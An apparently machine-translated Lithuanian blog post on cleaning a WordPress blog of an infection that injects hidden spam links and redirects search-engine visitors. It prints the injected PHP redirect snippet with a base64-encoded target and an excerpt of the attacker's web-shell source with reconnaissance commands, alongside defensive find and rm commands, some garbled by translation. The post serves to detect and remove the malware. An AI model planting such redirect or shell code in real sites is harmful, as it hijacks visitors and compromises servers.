Pastarąjį mėnesį vis sulaukdavau įspėjimų iš virusas tinklaraštyje iš kai kurių lankytojų. Iš pradžių aš ignoravau įspėjimus, nes turėjau įdiegtą gana gerą antivirusinę (Kaspersky AV 2009) ir nors ilgai praleidau dienoraštyje, perspėjimo apie virusą taip ir nesulaukiau (.. prieš kurį laiką pamačiau kažką įtartino, kuris dingo pirmą kartą atnaujinus. pagaliau...).
Lėtai, pamažu pradėjo atsirasti didelių variacijų lankytojų srautas, po kurio pastaruoju metu srautas nuolat mažėja ir pradėjo atsirasti vis daugiau žmonių, kurie man tai sako Stealthsettings.com Tai yra virusat. Vakar iš kažko gavau ekrano kopiją, padarytą, kai antivirusinė programa užblokavo scenarijus iš stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Man tai pakankamai įtikino, kad pradėjau jo ieškoti visuose šaltiniuose. Pirma mintis, kuri man atėjo į galvą, buvo tai padaryti atnaujinti į naujausią versiją WordPress (2.5.1), bet ne prieš tai, kai ištrinsite visus senus „WordPress“ scenarijaus failus ir nepadarysite duomenų bazės atsarginė kopija. Ši procedūra nedavė jokių rezultatų ir tikriausiai būčiau užtrukęs daug laiko, kol išsiaiškinčiau, kur yra klaida, jei jis nebūtų man pasakęs Eugenas diskusijoje prie kavos, kurią jis rado nuoroda „Google“ ir būtų gerai tai pamatyti.
MyDigitalLife.info paskelbė straipsnį pavadinimu: "„WordPress“ įsilaužimas: atkurkite ir pataisykite „Google“ ir paieškos variklį arba slapukų srautą neperadresuotų į Your-Needs.info, AnyResults.Net, Golden-Info.net ir kitas neteisėtas svetaines“, tai yra gijos, kurios man reikėjo, pabaiga.
Tai apie a išnaudojimas sukūrė WordPress, pagrįsta slapukais, kuris, mano nuomone, yra labai sudėtingas ir pagamintas pagal knygą. Pakankamai protingas, kad padarytų tokį SQL įpurškimas dienoraščio duomenų bazėje, sukurti nematomą vartotoją iki paprasto įprastinio patikrinimo nuo Prietaisų skydelis->Vartotojai, norėdami patikrinti „įrašomus“ katalogus ir failus serveryje (kurie turi chmod 777), ieškoti ir į vykdyti failus su grupės ar net root teisėmis. Nežinau išnaudojimo pavadinimo ir matau, kad apie tai parašyta nedaug straipsnių, nepaisant to, kad yra daug užkrėstų tinklaraščių, įskaitant iš Rumunijos. Gerai... Pabandysiu bendrai paaiškinti apie šį virusą.
Ką daro virusas?
Visų pirma, į tinklaraščių puslapių šaltinius įterpia nematomas nuorodas lankytojams, bet matomas ir indeksuojamas paieškos sistemoms, ypač Google. Tokiu būdu perkelti Page Rank į užpuoliko nurodytas svetaines. Antra, įterpiamas dar vienas peradresavimo kodas URL, skirtas lankytojams, kurie ateina iš Google, Live, Yahoo, ... arba iš RSS skaitytuvo ir neturi svetainės sausainis. Ir antivirusinė aptinka šį peradresavimą kaip Trojan-Clicker.HTML.
Simptomai:
Didelis lankytojų srauto sumažėjimas, ypač tinklaraščiuose, kuriuose dauguma lankytojų ateina iš „Google“.
Identifikuoti: (čia problema tampa sudėtingesnė tiems, kurie mažai žino apie phpmyadmin, php ir linux)
. ATSARGIAI!!! PIRMIAUSIA SUDARYKITE DUOMENŲ BAZĖS ATSARGINĘ KOPĄ!!!
1. Patikrinkite failų šaltinius index.php, header.php, footer.php, iš tinklaraščio temos ir pažiūrėkite, ar yra kodas, kuris naudoja šifravimą bazė64 arba yra "if($ser=="1? && sizeof($_COOKIE)==0)“ forma:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>...ar kažkas panašaus. Ištrinkite šį kodą!
Spustelėkite įsivaizduokite…
Aukščiau esančioje ekrano kopijoje klaidingai pasirinkau "<?php get_header(); ?>Tas kodas turi likti.
2. Naudoti Phpmyadmin ir eikite į lentelę duomenų bazėje wp_users, kuriame patikrinate, ar yra vartotojas be vardo, sukurtas 00:00:00 0000-00-00 (tai įmanoma lauke vartotojo_prisijungimas parašyti "WordPress". Užsirašykite šio vartotojo ID (ID lauką) ir ištrinkite.
Spustelėkite įsivaizduokite…
*esantis ant žalios linijos, jo ID turi būti ištrintas ir paliktas. Jo atveju mieguistas, buvo ID=8 .
3. Eikite prie stalo wp_usermeta, kur reikia esančios Tu esi Ištrinti eilutės, susijusios su ID (kur lauke vartotojo_id pasirodo ištrinto ID reikšmė).
4. Lentelėje wp_option, įeik Active_plugins ir pažiūrėkite, kuris papildinys įtartinai suaktyvintas. Galima naudoti tokias galūnes kaip _old.giff, _old.pngg, _old.jpeg, _new.php.giffir kt. netikrų vaizdo plėtinių deriniai su _old ir _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Ištrinkite šį papildinį, tada eikite į tinklaraštį –> Prietaisų skydelis –> Papildiniai, kuriuose išjungiate ir suaktyvinate tam tikrą papildinį.
Spustelėkite paveikslėlį, kad pamatytumėte, kaip užkrėstas failas atrodo Active_plugins.
Sekite FTP arba SSH keliu, nurodytu Active_plugins, ir ištrinkite failą iš serverio.
5. Taip pat phpMyAdmin, lentelėje wp_option, suraskite ir ištrinkite eilutę, kurioje yra "rss_f541b3abd05e7962fcab37737f40fad8"ir pasukite"internal_links_cache“.
Internal_links_cache, tinklaraštyje rodomos šlamšto nuorodos ir a Google Adsense kodas, įsilaužėlio.
6. Rekomenduojama, kad jūs pakeisti slaptažodį prisijungimo prie dienoraščio ir pan pašalinti visus įtartinus vartotojus. Atnaujinkite į naujausią „WordPress“ versiją ir nustatykite, kad tinklaraštis nebeleistų registruoti naujų vartotojų. Jokių nuostolių... komentuoti gali net neprisijungę.
Aukščiau bandžiau paaiškinti, kiek, ką daryti tokioje situacijoje, išvalyti tinklaraštį nuo šio viruso. Problema yra daug rimtesnė, nei atrodo, ir toli gražu nėra išspręsta, nes jie naudojami saugumo spragų prieglobos žiniatinklio serverio, kuriame yra tinklaraštis.
Kaip pirmoji saugumo priemonė, kurie turi prieigą Ssh, norėdami patikrinti, ar vis dar yra failų, pvz., *_old* ir *_new.* su galūnėmis .gif, .jpeg, .pngg, .jpgg. Šie failai turi būti ištrinti. Jei pervardysime failą, pvz. top_right_old.giff in top_right_old.php, matome, kad faile yra tiksliai serverio išnaudojimo kodas.
Keletas naudingų patarimų, kaip patikrinti, valyti ir apsaugoti serverį. (per SSH)
1. cd /tmp ir patikrinkite, ar yra tokių aplankų tmpVFlma ar kitus panašius vardų derinius ir ištrinkite. Žemiau esančioje ekrano kopijoje galite pamatyti du tokius aplankus:
rm –rf skaičių aplankas
2. Patikrinkite ir pašalinkite (pakeiskite chmod) kiek įmanoma daugiau aplankų su atributais chmod 777
rasti visus įrašomus failus dabartiniame kataloge: rasti. -tipo f -perm -2 -ls
rasti visus įrašomus katalogus dabartiniame kataloge: rasti. -tipo d -perm -2 -ls
rasti visus įrašomus katalogus ir failus dabartiniame kataloge: rasti. -perm -2 –ls
3. Ieškokite įtartinų failų serveryje.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ATSARGIAI!!! prie failų, kurie nustato bitą PIETUS ir Čiuožimas. Šie failai vykdomi su vartotojo (grupės) arba šaknies teisėmis, o ne su failą vykdančio vartotojo teisėmis. Jei kyla saugumo problemų, šie failai gali būti pažeisti. Jei nenaudojate failų su SUID ir SGID bitais, paleiskite „chmod 0" ant jų arba pašalinkite paketą, kuriame jie yra.
Išnaudojimo šaltinyje yra kažkur...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}...praktiškai tokiu būdu jis nustato saugumo pažeidimus. Atidarykite prievadus, „rašomus“ katalogus ir failų vykdymą su grupės / šakninėmis teisėmis.
Grįšiu su detalėmis...
Kai kurie užkrėsti tinklaraščiai: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... ir sąrašą galima tęsti ... daug.
Galite patikrinti, ar tinklaraštis yra užkrėstas, naudodamiesi „Google“ paieškos sistema. kopija & įklijuoti:
svetainė: www.blegoo.com pirkti
Labanakt ir gero darbo ;) Netrukus manau Eugenas ateis su naujienomis, prevezibil.imprevizibil.com.
brb :)
AT: DĖMESIO! WordPress temos keitimas arba atnaujinimas į WordPress 2.5.1 NĖRA sprendimas atsikratyti šio viruso.
